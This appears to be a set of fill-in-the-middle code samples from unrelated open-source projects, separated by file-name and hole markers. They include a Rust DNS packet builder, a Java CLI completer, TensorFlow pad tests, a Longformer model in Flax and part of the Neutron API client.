debug_assert_eq!(normalized_question.qclass, DNS_CLASS_CH);
packet.push((DNS_TYPE_TXT >> 8) as u8);
packet.push(DNS_TYPE_TXT as u8);
packet.push((DNS_CLASS_CH >> 8) as u8);
packet.push(DNS_CLASS_CH as u8);
packet.push(0xc0 + (DNS_HEADER_SIZE >> 8) as u8);
packet.push(DNS_HEADER_SIZE as u8);
packet.push((DNS_TYPE_TXT >> 8) as u8);
packet.push(DNS_TYPE_TXT as u8);
packet.push((DNS_CLASS_CH >> 8) as u8);
packet.push(DNS_CLASS_CH as u8);
packet.push((ttl >> 24) as u8);
packet.push((ttl >> 16) as u8);
packet.push((ttl >> 8) as u8);
packet.push(ttl as u8);
packet.push((rdata_len >> 8) as u8);
packet.push(rdata_len as u8);
packet.push(txt.len() as u8);
packet.extend_from_slice(txt);
Ok(packet)
}
pub fn build_probe_packet(qname: &[u8]) -> Result<Vec<u8>, &'static str> {
let capacity = DNS_HEADER_SIZE + qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_tid(&mut packet, random());
set_rd(&mut packet, true);
set_qdcount(&mut packet, 1);
packet.extend_from_slice(qname);
let qtype = DNS_TYPE_SOA;
let qclass = DNS_CLASS_IN;
packet.push((qtype >> 8) as u8);
packet.push(qtype as u8);
packet.push((qclass >> 8) as u8);
packet.push(qclass as u8);
Ok(packet)
}
pub fn build_query_packet(
normalized_question: &NormalizedQuestion,
force_dnssec: bool,
) -> Result<(Vec<u8>, NormalizedQuestionMinimal), &'static str> {
let mut qname = qname_lc(&normalized_question.qname);
let qname_len = qname.len();
let force_dnssec = if qname_len == 0 { true } else { force_dnssec };
if force_dnssec || normalized_question.dnssec {
if qname_len > 0 {
qname[qname_len - 1] &= !0x20;
}
}
let capacity = DNS_HEADER_SIZE + qname_len + 1 + 15;
let mut packet = Vec::with_capacity(capacity);
let tid: u16 = random();
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_tid(&mut packet, tid);
set_rd(&mut packet, true);
set_qdcount(&mut packet, 1);
set_arcount(&mut packet, 1);
packet.extend_from_slice(&qname);
packet.push(0);
packet.push((normalized_question.qtype >> 8) as u8);
packet.push(normalized_question.qtype as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
packet.push(0); // EDNS name
packet.push((DNS_TYPE_OPT >> 8) as u8);
packet.push(DNS_TYPE_OPT as u8);
packet.push((DNS_MAX_PACKET_SIZE >> 8) as u8);
packet.push(DNS_MAX_PACKET_SIZE as u8);
let edns_rcode_rdlen = if force_dnssec || normalized_question.dnssec {
[0u8, 0u8, 0x80u8, 0u8, 0u8, 0u8]
} else {
[0u8; 6]
};
packet.extend_from_slice(&edns_rcode_rdlen); // EDNS rcode + rdlen
let normalized_question_minimal = NormalizedQuestionMinimal {
qname: qname,
tid: tid,
qtype: normalized_question.qtype,
qclass: normalized_question.qclass,
};
Ok((packet, normalized_question_minimal))
}
pub fn qname_encode(name: &str) -> Result<Vec<u8>, &'static str> {
let mut encoded = Vec::with_capacity(name.len() + 1);
let mut final_dot = false;
for part in name.split('.') {
if final_dot {
return Err("Invalid name: unexpected dots");
}
let len = part.len();
if len > 0x3f {
return Err("Invalid name: label too long (> 63 characters)");
} else if len == 0 {
if name.len() == 1 {
break;
}
final_dot = true;
}
encoded.push(len as u8);
encoded.extend_from_slice(part.as_bytes());
}
if !final_dot {
encoded.push(0);
}
Ok(encoded)
}<|fim▁end|> | } |
<|file_name|>HttpMethodPrefixCompleter.java<|end_file_name|><|fim▁begin|>/*
* Copyright © 2014 Cask Data, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License
*/
package co.cask.cdap.cli.completer.element;
import co.cask.cdap.api.service.http.ServiceHttpEndpoint;
import co.cask.cdap.cli.CLIConfig;
import co.cask.cdap.cli.ProgramIdArgument;
import co.cask.cdap.cli.util.ArgumentParser;
import co.cask.cdap.client.ServiceClient;
import co.cask.cdap.common.NotFoundException;
import co.cask.cdap.common.UnauthorizedException;
import co.cask.cdap.proto.Id;
import co.cask.common.cli.completers.PrefixCompleter;
import com.google.common.collect.Lists;
import java.io.IOException;
import java.util.Collection;
import java.util.Collections;<|fim▁hole|>
/**
* Prefix completer for Http methods.
*/
public class HttpMethodPrefixCompleter extends PrefixCompleter {
private static final String PROGRAM_ID = "programId";
private static final String PATTERN = String.format("call service <%s>", PROGRAM_ID);
private final ServiceClient serviceClient;
private final EndpointCompleter completer;
private final CLIConfig cliConfig;
public HttpMethodPrefixCompleter(final ServiceClient serviceClient, final CLIConfig cliConfig,
String prefix, EndpointCompleter completer) {
super(prefix, completer);
this.cliConfig = cliConfig;
this.serviceClient = serviceClient;
this.completer = completer;
}
@Override
public int complete(String buffer, int cursor, List<CharSequence> candidates) {
Map<String, String> arguments = ArgumentParser.getArguments(buffer, PATTERN);
ProgramIdArgument programIdArgument = ArgumentParser.parseProgramId(arguments.get(PROGRAM_ID));
if (programIdArgument != null) {
Id.Service service = Id.Service.from(cliConfig.getCurrentNamespace(),
programIdArgument.getAppId(), programIdArgument.getProgramId());
completer.setEndpoints(getMethods(service));
} else {
completer.setEndpoints(Collections.<String>emptyList());
}
return super.complete(buffer, cursor, candidates);
}
public Collection<String> getMethods(Id.Service serviceId) {
Collection<String> httpMethods = Lists.newArrayList();
try {
for (ServiceHttpEndpoint endpoint : serviceClient.getEndpoints(serviceId)) {
String method = endpoint.getMethod();
if (!httpMethods.contains(method)) {
httpMethods.add(method);
}
}
} catch (IOException | UnauthorizedException | NotFoundException ignored) {
}
return httpMethods;
}
}<|fim▁end|> | import java.util.List;
import java.util.Map; |
<|file_name|>pad_op_test.py<|end_file_name|><|fim▁begin|># Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.nn_ops.Pad."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class PadOpTest(tf.test.TestCase):
def _npPad(self, inp, paddings, mode):
return np.pad(inp, paddings, mode=mode.lower())
def testNpPad(self):
self.assertAllEqual(
np.array([[0, 0, 0, 0, 0, 0],
[0, 3, 3, 0, 0, 0],
[0, 4, 4, 0, 0, 0],
[0, 5, 5, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]),
self._npPad(
np.array([[3, 3], [4, 4], [5, 5]]),
[[1, 2], [1, 3]],
mode="constant"))
self.assertAllEqual(
np.array([[4, 3, 4, 9, 4, 3],
[1, 0, 1, 2, 1, 0],
[4, 3, 4, 9, 4, 3],
[1, 0, 1, 2, 1, 0]]),
self._npPad(
np.array([[0, 1, 2], [3, 4, 9]]),
[[1, 1], [1, 2]],
mode="reflect"))
self.assertAllEqual(
np.array([[0, 0, 1, 2, 2, 1],
[0, 0, 1, 2, 2, 1],
[3, 3, 4, 9, 9, 4],
[3, 3, 4, 9, 9, 4]]),
self._npPad(
np.array([[0, 1, 2], [3, 4, 9]]),
[[1, 1], [1, 2]],
mode="symmetric"))
def _testPad(self, np_inputs, paddings, mode, use_gpu=False):
np_val = self._npPad(np_inputs, paddings, mode=mode)
with self.test_session(use_gpu=use_gpu):
tf_val = tf.pad(np_inputs, paddings, mode=mode)
out = tf_val.eval()
self.assertAllEqual(np_val, out)
self.assertShapeEqual(np_val, tf_val)
def _testGradient(self, x, a, mode):
with self.test_session():
inx = tf.convert_to_tensor(x)<|fim▁hole|> # Expected y's shape to be:
ys = list(np.array(x.shape) + np.sum(np.array(a), axis=1))
jacob_t, jacob_n = tf.test.compute_gradient(inx,
xs,
y,
ys,
x_init_value=x)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-5, atol=1e-5)
def _testAll(self, np_inputs, paddings):
for mode in ("CONSTANT", "REFLECT", "SYMMETRIC"):
self._testPad(np_inputs, paddings, mode=mode, use_gpu=False)
self._testPad(np_inputs, paddings, mode=mode, use_gpu=True)
if np_inputs.dtype == np.float32:
self._testGradient(np_inputs, paddings, mode=mode)
def testInputDims(self):
with self.test_session():
with self.assertRaises(ValueError):
tf.pad(
tf.reshape([1, 2], shape=[1, 2, 1, 1, 1, 1]),
tf.reshape([1, 2], shape=[1, 2]))
def testPaddingsDim(self):
with self.test_session():
with self.assertRaises(ValueError):
tf.pad(
tf.reshape([1, 2], shape=[1, 2]),
tf.reshape([1, 2], shape=[2]))
def testPaddingsDim2(self):
with self.test_session():
with self.assertRaises(ValueError):
tf.pad(
tf.reshape([1, 2], shape=[1, 2]),
tf.reshape([1, 2], shape=[2, 1]))
def testPaddingsDim3(self):
with self.test_session():
with self.assertRaises(ValueError):
tf.pad(
tf.reshape([1, 2], shape=[1, 2]),
tf.reshape([1, 2], shape=[1, 2]))
def testPaddingsDim4(self):
with self.test_session():
with self.assertRaises(ValueError):
tf.pad(
tf.reshape([1, 2], shape=[1, 2]),
tf.reshape([1, 2, 3, 4, 5, 6], shape=[3, 2]))
def testPaddingsNonNegative(self):
with self.test_session():
with self.assertRaisesRegexp(ValueError, "must be non-negative"):
tf.pad(
tf.constant([1], shape=[1]),
tf.constant([-1, 0], shape=[1, 2]))
def testPaddingsNonNegative2(self):
with self.test_session():
with self.assertRaisesRegexp(ValueError, "must be non-negative"):
tf.pad(
tf.constant([1], shape=[1]),
tf.constant([-1, 0], shape=[1, 2]))
def testPaddingsMaximum(self):
with self.test_session():
with self.assertRaises(Exception):
tf.pad(
tf.constant([1], shape=[2]),
tf.constant([2, 0], shape=[1, 2]),
mode="REFLECT").eval()
with self.assertRaises(Exception):
tf.pad(
tf.constant([1], shape=[2]),
tf.constant([0, 3], shape=[1, 2]),
mode="SYMMETRIC").eval()
def testIntTypes(self):
# TODO(touts): Figure out why the padding tests do not work on GPU
# for int types and rank > 2.
for t in [np.int32, np.int64]:
self._testAll((np.random.rand(4, 4, 3) * 100).astype(t),
[[1, 0], [2, 3], [0, 2]])
def testFloatTypes(self):
for t in [np.float32, np.float64, np.complex64]:
self._testAll(np.random.rand(2, 5).astype(t),
[[1, 0], [2, 0]])
def testShapeFunctionEdgeCases(self):
# Unknown paddings shape.
inp = tf.constant(0.0, shape=[4, 4, 4, 4])
padded = tf.pad(inp, tf.placeholder(tf.int32))
self.assertEqual([None, None, None, None], padded.get_shape().as_list())
# Unknown input shape.
inp = tf.placeholder(tf.float32)
padded = tf.pad(inp, [[2, 2], [2, 2]])
self.assertEqual([None, None], padded.get_shape().as_list())
# Unknown input and paddings shape.
inp = tf.placeholder(tf.float32)
padded = tf.pad(inp, tf.placeholder(tf.int32))
self.assertAllEqual(None, padded.get_shape().ndims)
def testScalars(self):
paddings = np.zeros((0, 2), dtype=np.int32)
inp = np.asarray(7)
for use_gpu in False, True:
with self.test_session(use_gpu=use_gpu):
tf_val = tf.pad(inp, paddings)
out = tf_val.eval()
self.assertAllEqual(inp, out)
self.assertShapeEqual(inp, tf_val)
if __name__ == "__main__":
tf.test.main()<|fim▁end|> | xs = list(x.shape)
ina = tf.convert_to_tensor(a)
y = tf.pad(inx, ina, mode=mode) |
<|file_name|>db.py<|end_file_name|><|fim▁begin|>import logging
import json
import time
from collections import defaultdict
from flotilla.model import FlotillaServiceRevision, FlotillaUnit, \
GLOBAL_ASSIGNMENT, GLOBAL_ASSIGNMENT_SHARDS
from Crypto.Cipher import AES
logger = logging.getLogger('flotilla')
class FlotillaAgentDynamo(object):
"""Database interaction for worker/agent component.
Required table permissions:
status
-PutItem
assignments:
- BatchGetItem
revisions:
- BatchGetItem
units:
- BatchGetItem
"""
def __init__(self, instance_id, service_name, status_table,
assignments_table, revisions_table, units_table, kms):
self._id = instance_id
global_shard = hash(instance_id) % GLOBAL_ASSIGNMENT_SHARDS
self._global_id = '%s_%d' % (GLOBAL_ASSIGNMENT, global_shard)
self._service = service_name
self._status = status_table
self._assignments = assignments_table
self._revisions = revisions_table
self._units = units_table
self._kms = kms
def store_status(self, unit_status):
"""Store unit status.
:param unit_status Unit statuses.
"""
logger.debug('Storing status as %s...', self._id)
data = dict(unit_status)
data['service'] = self._service
data['instance_id'] = self._id
data['status_time'] = time.time()
self._status.put_item(data=data, overwrite=True)
logger.info('Stored status of %s units as %s.', len(unit_status),
self._id)
def get_assignments(self):
assignments = self._assignments.batch_get([
{'instance_id': self._id}, {'instance_id': self._global_id}])
assigned_revisions = [assignment['assignment'] for assignment in
assignments]
return sorted(assigned_revisions)
def get_units(self, assigned_revisions):
"""
Get currently assigned FlotillaUnits.
:param assigned_revisions: Assigned revisions
:return: Revisions.
"""
# Fetch every revision and index units:
revisions = {}
unit_revisions = defaultdict(list)
revision_keys = [{'rev_hash': assigned_revision}
for assigned_revision in set(assigned_revisions)]
for revision_item in self._revisions.batch_get(revision_keys):
rev_hash = revision_item['rev_hash']
revision = FlotillaServiceRevision(label=revision_item['label'])
revisions[rev_hash] = revision
for unit in revision_item['units']:
unit_revisions[unit].append(rev_hash)
# Fetch every unit:
units = []
unit_keys = [{'unit_hash': unit_hash}
for unit_hash in sorted(unit_revisions.keys())]
logger.debug('Fetching %d units for %d/%d revisions.', len(unit_keys),
len(revisions), len(assigned_revisions))
for unit_item in self._units.batch_get(unit_keys):
env_key = unit_item.get('environment_key')
if env_key:
decrypted_key = self._kms.decrypt(env_key.decode('base64'))
iv = unit_item['environment_iv'].decode('base64')
aes = AES.new(decrypted_key['Plaintext'], AES.MODE_CBC, iv)
ciphertext = unit_item['environment_data'].decode('base64')
plaintext = aes.decrypt(ciphertext)
unit_environment = json.loads(plaintext)
else:<|fim▁hole|> unit_hash = unit.unit_hash
if unit_hash != unit_item['unit_hash']:
logger.warn('Unit hash %s expected %s', unit_hash,
unit_item['unit_hash'])
unit_hash = unit_item['unit_hash']
for revision in unit_revisions[unit_hash]:
rev_unit = FlotillaUnit(unit_item['name'], unit_file,
unit_environment, rev_hash)
units.append(rev_unit)
revisions[revision].units.append(rev_unit)
# Verify each revision matches expected hash:
for expected_hash, revision in revisions.items():
revision_hash = revision.revision_hash
if revision_hash != expected_hash:
# FIXME: enforce?
logger.warn('Revision hash %s expected %s', revision_hash,
expected_hash)
return units<|fim▁end|> | unit_environment = unit_item['environment']
unit_file = unit_item['unit_file']
unit = FlotillaUnit(unit_item['name'], unit_file, unit_environment) |
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>from setuptools import setup, find_packages
import gravatar
<|fim▁hole|> packages=find_packages(),
long_description=open('README.md').read(),
install_requires=[
'Django',
]
)<|fim▁end|> | setup(
name='dj-gravatar',
version=gravatar.__version__, |
<|file_name|>randomword.py<|end_file_name|><|fim▁begin|><|fim▁hole|>#!/usr/bin/env python
import subprocess, random, sys, os
def randomrange():
try:
value1 = int(sys.argv[1])
value2 = int(sys.argv[2])
randvalue = random.randint(value1, value2)
return randvalue
except IndexError:
randvalue = random.randint(0,10000000)
return randvalue
def main():
value = randomrange()
print(value)
main()<|fim▁end|> | |
<|file_name|>longformer.py<|end_file_name|><|fim▁begin|># Copyright 2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Longformer modules."""
from flax import nn
import jax.numpy as jnp
from lra_benchmarks.models.layers import common_layers
from lra_benchmarks.models.longformer import longformer_attention
class LongformerBlock(nn.Module):
"""Longformer Layer."""
def apply(self,
inputs,
qkv_dim,
mlp_dim,
num_heads,
sliding_window_size=512,
global_mask=None,
causal_mask=False,
dtype=jnp.float32,
inputs_segmentation=None,
padding_mask=None,
dropout_rate=0.1,
attention_dropout_rate=0.1,
deterministic=False):
"""Applies the LongformerBlock module.
Args:
inputs: input data of size `[bs, seq_len, features]`.
qkv_dim: dimension of the query/key/value.
mlp_dim: dimension of the mlp on top of attention block.
num_heads: number of attention heads.
sliding_window_size: size of sliding window attention to use.
global_mask: boolean matrix of shape `[bs, seq_len]`, where `True`
indicates that the position is globally attended. By default, no global
attention is used.
causal_mask: If true, apply causal attention mask.
dtype: the dtype of the computation (default: float32).
inputs_segmentation: input segmentation info for packed examples.
padding_mask: bool, mask padding tokens.
dropout_rate: dropout rate
attention_dropout_rate: dropout rate for attention weights
deterministic: if true, apply dropout else don't.
Returns:
output of shape `[bs, seq_len, mlp_dim]`.
"""
assert inputs.ndim == 3
x = nn.LayerNorm(inputs)
x = longformer_attention.LongformerSelfAttention(
x,
num_heads=num_heads,
qkv_features=qkv_dim,
sliding_window_size=sliding_window_size,
global_mask=global_mask,
causal_mask=causal_mask,
dtype=dtype,
segmentation=inputs_segmentation,
padding_mask=padding_mask,
kernel_init=nn.initializers.xavier_uniform(),
bias_init=nn.initializers.normal(stddev=1e-6),
bias=False,
broadcast_dropout=False,
dropout_rate=attention_dropout_rate,
deterministic=deterministic)
x = nn.dropout(x, rate=dropout_rate, deterministic=deterministic)
x = x + inputs
y = nn.LayerNorm(x)
y = common_layers.MlpBlock(
y,
mlp_dim=mlp_dim,
dtype=dtype,
dropout_rate=dropout_rate,
deterministic=deterministic)
return x + y
class LongformerEncoder(nn.Module):
"""Longformer Encoder."""
def apply(self,
inputs,
vocab_size,
sliding_window_size=512,
global_mask=None,
causal_mask=False,
inputs_positions=None,
inputs_segmentation=None,
shared_embedding=None,
use_bfloat16=False,
emb_dim=512,
num_heads=8,
dtype=jnp.float32,
num_layers=6,
qkv_dim=512,
mlp_dim=2048,
max_len=512,
train=True,
dropout_rate=0.1,
attention_dropout_rate=0.1,
learn_pos_emb=False,
classifier=False,
classifier_pool='CLS',
num_classes=10):
"""Applies Longformer model on the inputs.
Args:
inputs: input data.
vocab_size: size of the vocabulary.
sliding_window_size: size of sliding window attention to use.
global_mask: boolean matrix of shape `[bs, seq_len]`, where `True`
indicates that the position is globally attended. By default, no global
attention is used.
causal_mask: If true, apply causal attention masking.
inputs_positions: input subsequence positions for packed examples.
inputs_segmentation: input segmentation info for packed examples.
shared_embedding: a shared embedding layer to use.
use_bfloat16: bool: whether use bfloat16.
emb_dim: dimension of embedding
num_heads: number of heads
dtype: the dtype of the computation (default: float32)
num_layers: number of layers
qkv_dim: dimension of the query/key/value
mlp_dim: dimension of the mlp on top of attention block
max_len: maximum length.
train: if it is training,
dropout_rate: dropout rate
attention_dropout_rate: dropout rate for attention weights
learn_pos_emb: boolean, if learn the positional embedding or use the
sinusoidal positional embedding.
classifier: boolean, for classification mode (output N-class logits)
classifier_pool: str, supports "MEAN", "MAX" pooling.
num_classes: int, number of classification classes.
Returns:
output of the encoder or logits if classifier_mode is true.
"""
assert inputs.ndim == 2 # (batch, len)
# Padding Masks
src_padding_mask = (inputs > 0)[..., None]
# Input Embedding
if shared_embedding is None:
input_embed = nn.Embed.partial(
num_embeddings=vocab_size,
features=emb_dim,
embedding_init=nn.initializers.normal(stddev=1.0))
else:
input_embed = shared_embedding
x = inputs.astype('int32')
x = input_embed(x)
if classifier and classifier_pool == 'CLS':<|fim▁hole|> max_len += 1
src_padding_mask = jnp.concatenate(
[src_padding_mask[:, :1], src_padding_mask], axis=1)
pe_init = nn.initializers.normal(stddev=0.02) if learn_pos_emb else None
x = common_layers.AddPositionEmbs(
x,
inputs_positions=inputs_positions,
posemb_init=pe_init,
max_len=max_len,
name='posembed_input')
x = nn.dropout(x, rate=dropout_rate, deterministic=not train)
if use_bfloat16:
x = x.astype(jnp.bfloat16)
dtype = jnp.bfloat16
else:
dtype = jnp.float32
# Input Encoder
for lyr in range(num_layers):
x = LongformerBlock(
x,
qkv_dim=qkv_dim,
mlp_dim=mlp_dim,
num_heads=num_heads,
sliding_window_size=sliding_window_size,
global_mask=global_mask,
causal_mask=causal_mask,
dtype=dtype,
inputs_segmentation=inputs_segmentation,
padding_mask=src_padding_mask,
dropout_rate=dropout_rate,
attention_dropout_rate=attention_dropout_rate,
deterministic=not train,
name=f'encoderblock_{lyr}')
encoded = nn.LayerNorm(x, dtype=dtype, name='encoder_norm')
if classifier:
encoded = common_layers.classifier_head(
encoded, num_classes, mlp_dim, pooling_mode=classifier_pool)
return encoded
class LongformerDualEncoder(nn.Module):
"""Longformer Model for Matching (dual encoding) tasks."""
def apply(self,
inputs1,
inputs2,
vocab_size=None,
inputs1_positions=None,
inputs2_positions=None,
inputs1_segmentation=None,
inputs2_segmentation=None,
use_bfloat16=False,
emb_dim=512,
num_heads=8,
num_layers=6,
qkv_dim=512,
mlp_dim=2048,
max_len=2048,
train=False,
dropout_rate=0.1,
attention_dropout_rate=0.1,
classifier=True,
classifier_pool='CLS',
num_classes=2,
interaction=None
):
"""Applies Transformer model on text similarity.
A deliberate choice to distinguish this from NLI because
we may want to do different things to the model later. Dual Encoding
mode enforces that we do not do cross attention between pairs.
Args:
inputs1: input data.
inputs2: target data.
vocab_size: size of the input vocabulary.
inputs1_positions: input subsequence positions for packed examples.
inputs2_positions: target subsequence positions for packed examples.
inputs1_segmentation: input segmentation info for packed examples.
inputs2_segmentation: target segmentation info for packed examples.
use_bfloat16: bool: whether use bfloat16.
emb_dim: dimension of embedding.
num_heads: number of heads.
num_layers: number of layers.
qkv_dim: dimension of the query/key/value.
mlp_dim: dimension of the mlp on top of attention block.
max_len: maximum length.
train: whether it is training.
dropout_rate: dropout rate.
attention_dropout_rate: dropout rate for attention weights.
classifier: boolean, to use classifier.
classifier_pool: str, supports "MEAN", "MAX" pooling.
num_classes: int, number of classification classes.
interaction: str
Returns:
output of a transformer decoder.
"""
encoder = LongformerEncoder.shared(
inputs_positions=inputs1_positions,
inputs_segmentation=inputs1_segmentation,
vocab_size=vocab_size,
use_bfloat16=use_bfloat16,
emb_dim=emb_dim,
num_heads=num_heads,
num_layers=num_layers,
qkv_dim=qkv_dim,
mlp_dim=mlp_dim,
max_len=max_len,
train=train,
dropout_rate=dropout_rate,
attention_dropout_rate=attention_dropout_rate,
name='encoder')
inputs1_encoded = encoder(inputs1)
inputs2_encoded = encoder(inputs2)
encoded = common_layers.classifier_head_dual(
inputs1_encoded,
inputs2_encoded,
num_classes,
mlp_dim,
pooling_mode=classifier_pool,
interaction=interaction)
return encoded
class LongformerDecoder(nn.Module):
"""Longformer Decoder."""
def apply(self,
inputs,
vocab_size,
sliding_window_size=512,
global_mask=None,
emb_dim=512,
num_heads=8,
dtype=jnp.float32,
num_layers=6,
qkv_dim=512,
mlp_dim=2048,
max_len=2048,
train=False,
shift=True,
dropout_rate=0.1,
attention_dropout_rate=0.1):
"""Applies Longformer model on the inputs, using causal masking.
Args:
inputs: input data
vocab_size: size of the vocabulary
sliding_window_size: size of sliding window attention to use.
global_mask: boolean matrix of shape `[bs, seq_len]`, where `True`
indicates that the position is globally attended. By default, no global
attention is used.
emb_dim: dimension of embedding
num_heads: number of heads
dtype: the dtype of the computation (default: float32)
num_layers: number of layers
qkv_dim: dimension of the query/key/value
mlp_dim: dimension of the mlp on top of attention block
max_len: maximum length.
train: bool: if model is training.
shift: bool: if we right-shift input - this is only disabled for
fast, looped single-token autoregressive decoding.
dropout_rate: dropout rate
attention_dropout_rate: dropout rate for attention weights
Returns:
output of a transformer decoder.
"""
padding_mask = jnp.where(inputs > 0, 1, 0).astype(jnp.float32)[..., None]
assert inputs.ndim == 2 # (batch, len)
x = inputs
if shift:
x = common_layers.shift_right(x)
x = x.astype('int32')
x = common_layers.Embed(
x, num_embeddings=vocab_size, features=emb_dim, name='embed')
x = common_layers.AddPositionEmbs(
x,
max_len=max_len,
posemb_init=common_layers.sinusoidal_init(max_len=max_len),
cache=None)
x = nn.dropout(x, rate=dropout_rate, deterministic=not train)
for _ in range(num_layers):
x = LongformerBlock(
x,
qkv_dim=qkv_dim,
mlp_dim=mlp_dim,
num_heads=num_heads,
sliding_window_size=sliding_window_size,
global_mask=global_mask,
causal_mask=True,
padding_mask=padding_mask,
dropout_rate=dropout_rate,
attention_dropout_rate=attention_dropout_rate,
deterministic=not train,
cache=None,
)
x = nn.LayerNorm(x)
logits = nn.Dense(
x,
vocab_size,
kernel_init=nn.initializers.xavier_uniform(),
bias_init=nn.initializers.normal(stddev=1e-6))
return logits<|fim▁end|> | cls = self.param('cls', (1, 1, emb_dim), nn.initializers.zeros)
cls = jnp.tile(cls, [x.shape[0], 1, 1])
x = jnp.concatenate([cls, x], axis=1) |
<|file_name|>client.py<|end_file_name|><|fim▁begin|># Copyright 2012 OpenStack Foundation.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import logging
import time
import urllib
import requests
import six.moves.urllib.parse as urlparse
from neutronclient import client
from neutronclient.common import _
from neutronclient.common import constants
from neutronclient.common import exceptions
from neutronclient.common import serializer
from neutronclient.common import utils
_logger = logging.getLogger(__name__)
def exception_handler_v20(status_code, error_content):
"""Exception handler for API v2.0 client.
This routine generates the appropriate Neutron exception according to
the contents of the response body.
:param status_code: HTTP error status code
:param error_content: deserialized body of error response
"""
error_dict = None
if isinstance(error_content, dict):
error_dict = error_content.get('NeutronError')
# Find real error type
bad_neutron_error_flag = False
if error_dict:
# If Neutron key is found, it will definitely contain
# a 'message' and 'type' keys?
try:
error_type = error_dict['type']
error_message = error_dict['message']
if error_dict['detail']:
error_message += "\n" + error_dict['detail']
except Exception:
bad_neutron_error_flag = True
if not bad_neutron_error_flag:
# If corresponding exception is defined, use it.
client_exc = getattr(exceptions, '%sClient' % error_type, None)
# Otherwise look up per status-code client exception
if not client_exc:
client_exc = exceptions.HTTP_EXCEPTION_MAP.get(status_code)
if client_exc:
raise client_exc(message=error_message,
status_code=status_code)
else:
raise exceptions.NeutronClientException(
status_code=status_code, message=error_message)
else:
raise exceptions.NeutronClientException(status_code=status_code,
message=error_dict)
else:
message = None
if isinstance(error_content, dict):
message = error_content.get('message')
if message:
raise exceptions.NeutronClientException(status_code=status_code,
message=message)
# If we end up here the exception was not a neutron error
msg = "%s-%s" % (status_code, error_content)
raise exceptions.NeutronClientException(status_code=status_code,
message=msg)
class APIParamsCall(object):
"""A Decorator to add support for format and tenant overriding and filters.
"""
def __init__(self, function):
self.function = function
def __get__(self, instance, owner):
def with_params(*args, **kwargs):
_format = instance.format
if 'format' in kwargs:
instance.format = kwargs['format']
ret = self.function(instance, *args, **kwargs)
instance.format = _format
return ret
return with_params
class Client(object):
"""Client for the OpenStack Neutron v2.0 API.
:param string username: Username for authentication. (optional)
:param string user_id: User ID for authentication. (optional)
:param string password: Password for authentication. (optional)
:param string token: Token for authentication. (optional)
:param string tenant_name: Tenant name. (optional)
:param string tenant_id: Tenant id. (optional)
:param string auth_url: Keystone service endpoint for authorization.
:param string service_type: Network service type to pull from the
keystone catalog (e.g. 'network') (optional)
:param string endpoint_type: Network service endpoint type to pull from the
keystone catalog (e.g. 'publicURL',
'internalURL', or 'adminURL') (optional)
:param string region_name: Name of a region to select when choosing an
endpoint from the service catalog.
:param string endpoint_url: A user-supplied endpoint URL for the neutron
service. Lazy-authentication is possible for API
service calls if endpoint is set at
instantiation.(optional)
:param integer timeout: Allows customization of the timeout for client
http requests. (optional)
:param bool insecure: SSL certificate validation. (optional)
:param string ca_cert: SSL CA bundle file to use. (optional)
:param integer retries: How many times idempotent (GET, PUT, DELETE)
requests to Neutron server should be retried if
they fail (default: 0).
:param bool raise_errors: If True then exceptions caused by connection
failure are propagated to the caller.
(default: True)
:param session: Keystone client auth session to use. (optional)
:param auth: Keystone auth plugin to use. (optional)
Example::
from neutronclient.v2_0 import client
neutron = client.Client(username=USER,
password=PASS,
tenant_name=TENANT_NAME,
auth_url=KEYSTONE_URL)
nets = neutron.list_networks()
...
"""
networks_path = "/networks"
network_path = "/networks/%s"
ports_path = "/ports"
port_path = "/ports/%s"
subnets_path = "/subnets"
subnet_path = "/subnets/%s"
quotas_path = "/quotas"
quota_path = "/quotas/%s"
extensions_path = "/extensions"
extension_path = "/extensions/%s"
routers_path = "/routers"
router_path = "/routers/%s"
floatingips_path = "/floatingips"
floatingip_path = "/floatingips/%s"
security_groups_path = "/security-groups"
security_group_path = "/security-groups/%s"
security_group_rules_path = "/security-group-rules"
security_group_rule_path = "/security-group-rules/%s"
vpnservices_path = "/vpn/vpnservices"
vpnservice_path = "/vpn/vpnservices/%s"
ipsecpolicies_path = "/vpn/ipsecpolicies"
ipsecpolicy_path = "/vpn/ipsecpolicies/%s"
ikepolicies_path = "/vpn/ikepolicies"
ikepolicy_path = "/vpn/ikepolicies/%s"
ipsec_site_connections_path = "/vpn/ipsec-site-connections"
ipsec_site_connection_path = "/vpn/ipsec-site-connections/%s"
vips_path = "/lb/vips"
